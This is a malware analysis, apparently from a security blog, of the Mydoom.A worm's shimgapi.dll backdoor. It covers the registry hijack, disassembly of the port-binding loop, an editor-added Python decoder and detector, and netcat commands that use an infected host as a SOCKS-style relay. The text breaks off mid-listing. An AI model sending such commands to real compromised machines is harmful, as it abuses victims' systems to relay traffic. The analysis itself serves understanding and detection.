Analysis of shimgapi.dll of Mydoom.A


Source: http://blog.csdn.net/sunwear/

Tombkeeper # whitecell.org


The backdoor of Mydoom.A exists as a DLL. By modifying the corresponding registry value, it gets itself loaded into the address space of Explorer (the Windows Explorer process).

Under normal circumstances, the registry entry looks like this:
HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32
    (Default)        REG_EXPAND_SZ    %SystemRoot%\System32\webcheck.dll
    ThreadingModel   REG_SZ           Apartment

Mydoom.A replaces %SystemRoot%\System32\webcheck.dll with its own shimgapi.dll.

By default, the shimgapi.dll backdoor listens on port 3127. If that port is already in use, it moves up one port at a time, but never beyond 3198.

The backdoor provides two functions:
1. It acts as a port-forwarding proxy.
2. It acts as a backdoor that receives an uploaded program and executes it.

Related code:
.text:7E1A1C44 sub_7E1A1C44 proc near          ; DATA XREF: start+19o
.text:7E1A1C44
.text:7E1A1C44 WSAData = WSAData ptr -190h
.text:7E1A1C44
.text:7E1A1C44     sub     esp, 190h
.text:7E1A1C4A     push    esi
.text:7E1A1C4B     push    edi
.text:7E1A1C4C     call    sub_7E1A1A1F
.text:7E1A1C51     lea     eax, [esp+198h+WSAData]
.text:7E1A1C55     push    eax                  ; lpWSAData
.text:7E1A1C56     push    2                    ; wVersionRequested
.text:7E1A1C58     call    ds:WSAStartup
.text:7E1A1C5E     call    Address
.text:7E1A1C63     mov     edi, ds:Sleep
.text:7E1A1C69     mov     esi, 0C37h           ; start listening on port 3127
.text:7E1A1C6E
.text:7E1A1C6E loc_7E1A1C6E:                    ; CODE XREF: sub_7E1A1C44+50j
.text:7E1A1C6E     push    3
.text:7E1A1C70     push    esi
.text:7E1A1C71     call    sub_7E1A1B52         ; bind subroutine
.text:7E1A1C76     pop     ecx
.text:7E1A1C77     pop     ecx
.text:7E1A1C78     push    400h                 ; dwMilliseconds
.text:7E1A1C7D     call    edi                  ; Sleep
.text:7E1A1C7F     cmp     esi, 0C7Eh           ; port must not exceed 3198
.text:7E1A1C85     jle     short loc_7E1A1C93
.text:7E1A1C87     push    800h                 ; dwMilliseconds
.text:7E1A1C8C     call    edi                  ; Sleep
.text:7E1A1C8E     mov     esi, 0C37h           ; past 3198: reset to 3127
.text:7E1A1C93
.text:7E1A1C93 loc_7E1A1C93:                    ; CODE XREF: sub_7E1A1C44+41j
.text:7E1A1C93     inc     esi                  ; move to the next port and bind again
.text:7E1A1C94     jmp     short loc_7E1A1C6E
.text:7E1A1C94 sub_7E1A1C44 endp

After a connection is accepted on port 3127, if the first byte received is 0x04, control passes to the port-forwarding routine, which: checks that the second byte is 0x01 --> takes bytes 5 through 8 as the destination IP address --> takes bytes 3 and 4 as the destination port --> connects to that destination and relays data between it and the current socket.

For example, we use \x00\x6e\xc0\xa8\x01\x0b as the connection command: \x00\x6e is port 110, and \xc0\xa8\x01\x0b is 192.168.1.11.

# printf "\x04\x01\x00\x6e\xc0\xa8\x01\x0b\x00" | nc 192.168.7.33 3127
Z+OK Microsoft Exchange Server 2003 POP3 server version 6.5.6944.0 ready.

We can see that the banner from port 110 of 192.168.1.11 is relayed back to us. Note that a short block of data precedes the returned text. Test again:

# printf "\x04\x01\x00\x6e\xc0\xa8\x01\x0b\x00" | nc 192.168.7.33 3127 | xxd -g 1
0000000: 04 5a 00 6e c0 a8 01 0b 2b 4f 4b 20 4d 69 63 72  .Z.n....+OK Micr
0000010: 6f 73 6f 66 74 20 45 78 63 68 61 6e 67 65 20 53  osoft Exchange S
0000020: 65 72 76 65 72 20 32 30 30 33 20 50 4f 50 33 20  erver 2003 POP3 
0000030: 73 65 72 76 65 72 20 76 65 72 73 69 6f 6e 20 36  server version 6
0000040: 2e 35 2e 36 39 34 34 2e 30 20 28 64 63 2e 69 6e  .5.6944.0 (dc.in

Now send a command to connect to port 98, on which nothing is listening:
# printf "\x04\x01\x00\x62\xc0\xa8\x01\x0b\x00" | nc 192.168.7.33 3127 | xxd -g 1
0000000: 04 5b 00 62 c0 a8 01 0b                          .[.b....

Clearly, that leading block of data reports the connection status: 04 5a means the connection succeeded, and 04 5b means it failed. It is followed by an echo of the connect command that was sent. This was probably designed by the worm's author so that the client can judge the result.
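An added decoder for the request and reply format worked out above (editor's example, not code from the original analysis). The layout seen here, 0x04 0x01 followed by a 2-byte port, a 4-byte address and a NUL-terminated user field, answered with 0x5A for success and 0x5B for failure, is the same as a SOCKS4 CONNECT request and reply; the sample bytes are the ones from the tests above, constructed inline rather than captured, and the port range comes from the bind loop in the listing.

```python
import ipaddress
import struct

# Ports the backdoor binds to: 3127 first, then one higher on each failure,
# never above 3198 (from the bind loop in the listing above).
BACKDOOR_PORTS = range(3127, 3199)

# Reply status bytes observed above: 0x5a = connected, 0x5b = connect failed.
STATUS = {0x5A: "granted", 0x5B: "rejected"}


def parse_connect_request(data: bytes):
    """Decode the proxy command: 04 01 <port:2> <ip:4> <userid...> 00.

    Returns (port, ip) or None when the bytes are not a valid request.
    """
    if len(data) < 9 or data[0] != 0x04 or data[1] != 0x01:
        return None
    (port,) = struct.unpack("!H", data[2:4])        # big-endian port
    ip = str(ipaddress.IPv4Address(data[4:8]))       # four raw address bytes
    if b"\x00" not in data[8:]:                      # NUL terminator required
        return None
    return port, ip


def parse_reply(data: bytes):
    """Decode the 8-byte status prefix the backdoor puts before relayed data.

    Returns (status, echoed port, echoed ip, payload) or None.
    """
    if len(data) < 8 or data[0] != 0x04 or data[1] not in STATUS:
        return None
    (port,) = struct.unpack("!H", data[2:4])
    ip = str(ipaddress.IPv4Address(data[4:8]))
    return STATUS[data[1]], port, ip, data[8:]


def looks_like_mydoom_proxy(dst_port: int, payload: bytes) -> bool:
    """Flag a flow to a 3127-3198 listener whose first bytes form a request."""
    return dst_port in BACKDOOR_PORTS and parse_connect_request(payload) is not None


# Constructed samples reproducing the tests on this page (not captured traffic).
REQUEST = b"\x04\x01\x00\x6e\xc0\xa8\x01\x0b\x00"
REPLY_OK = bytes.fromhex("045a006ec0a8010b") + b"+OK Microsoft Exchange"
REPLY_FAIL = bytes.fromhex("045b0062c0a8010b")

if __name__ == "__main__":
    print(parse_connect_request(REQUEST))      # (110, '192.168.1.11')
    print(parse_reply(REPLY_OK)[:3])           # ('granted', 110, '192.168.1.11')
    print(parse_reply(REPLY_FAIL)[:3])         # ('rejected', 98, '192.168.1.11')
```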

Related code:
.text:7E1A17F5
.text:7E1A17F5 loc_7E1A17F5:                    ; CODE XREF: sub_7E1A17BA+2Bj
.text:7E1A17F5     cmp     byte ptr [ebp-1], 4  ; check whether the first byte is 0x04
.text:
